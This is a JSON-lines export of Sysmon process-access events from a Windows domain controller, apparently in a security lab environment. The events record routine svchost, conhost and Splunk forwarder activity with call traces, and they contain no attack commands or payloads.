{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-212D-5F25-0000-0010D0650900}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-212D-5F25-0000-0010D0650900}","TargetProcessId":"2360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
